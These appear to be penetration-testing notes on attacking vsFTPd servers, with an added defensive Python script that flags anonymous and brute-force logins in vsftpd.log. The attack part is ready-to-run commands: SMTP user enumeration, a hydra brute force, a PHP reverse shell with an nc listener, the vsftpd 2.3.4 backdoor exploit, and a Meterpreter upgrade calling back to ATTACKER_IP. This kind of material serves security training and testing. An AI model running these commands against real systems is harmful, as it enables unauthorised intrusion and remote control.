vsFTPd
- Check anonymous login.
- If the target has SMTP enabled, enumerate users on the system:
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS TARGET_IP
set UNIXONLY true
run
- Perform a brute-force attack using the list of users obtained with SMTP:
hydra -L USERS_LIST -P PASSWORDS_LIST TARGET_IP ftp
- If WebDAV is enabled, upload a webshell to its directory and
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
# Modify IP and port values
# Upload the shell to the dav directory
put shell.php /var/www/dav/shell.php
nc -nvlp ATTACKER_PORT
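
On the defensive side, the anonymous-login check and the brute-force step above both leave login records in the server's vsftpd.log. The following is an added example, not part of the original notes: it assumes vsftpd's default log line layout and that anonymous sessions are logged under the user "ftp" or "anonymous"; the sample lines, addresses, account names and the threshold/window values are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed layout of vsftpd.log login records (default vsftpd logging).
LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

# Constructed sample log (documentation-range addresses, made-up accounts).
SAMPLE_LOG = """\
Tue Mar 12 10:00:01 2024 [pid 2101] [ftp] OK LOGIN: Client "198.51.100.7", anon password "guest@example.com"
Tue Mar 12 10:01:30 2024 [pid 2105] [carol] FAIL LOGIN: Client "198.51.100.9"
Tue Mar 12 10:01:41 2024 [pid 2106] [carol] OK LOGIN: Client "198.51.100.9"
Tue Mar 12 10:02:10 2024 [pid 2110] [alice] FAIL LOGIN: Client "192.0.2.44"
Tue Mar 12 10:02:12 2024 [pid 2111] [bob] FAIL LOGIN: Client "192.0.2.44"
Tue Mar 12 10:02:14 2024 [pid 2112] [dave] FAIL LOGIN: Client "192.0.2.44"
Tue Mar 12 10:02:16 2024 [pid 2113] [erin] FAIL LOGIN: Client "192.0.2.44"
Tue Mar 12 10:02:18 2024 [pid 2114] [backup] FAIL LOGIN: Client "192.0.2.44"
Tue Mar 12 10:02:20 2024 [pid 2115] [backup] OK LOGIN: Client "192.0.2.44"
"""

def analyze(lines, threshold=5, window=timedelta(minutes=1)):
    """Return (anonymous logins, brute-force sources, logins that followed a burst)."""
    anon, brute, hits = [], set(), []
    fails = defaultdict(list)              # source IP -> recent failure times
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                       # not a login record
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        user, ip = m["user"], m["ip"]
        if m["result"] == "FAIL":
            # Sliding window: keep only failures close enough to this one.
            fails[ip] = [t for t in fails[ip] if ts - t <= window] + [ts]
            if len(fails[ip]) >= threshold:
                brute.add(ip)
        elif user in ("ftp", "anonymous"):
            anon.append((ip, m["ts"]))     # anonymous access is enabled
        elif ip in brute:
            hits.append((ip, user))        # success after a guessing burst
    return anon, sorted(brute), hits

if __name__ == "__main__":
    anon, brute, hits = analyze(SAMPLE_LOG.splitlines())
    print("anonymous logins:", anon)
    print("brute-force sources:", brute)
    print("accounts to reset:", hits)
```

A single mistyped password followed by a successful login (carol in the sample) stays below the threshold and is not reported.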
vsFTPd v2.3.4
vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, designed to be fast and lightweight while providing the essential features for file transfer operations.
vsftpd v2.3.4 is vulnerable to command execution through a malicious backdoor that was added to the vsftpd download archive in a supply chain attack.
Exploitation using Metasploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS TARGET_IP
run
# Once exploited, upgrade the shell to a Meterpreter session
use post/multi/manage/shell_to_meterpreter
set LHOST ATTACKER_IP
set SESSION session_id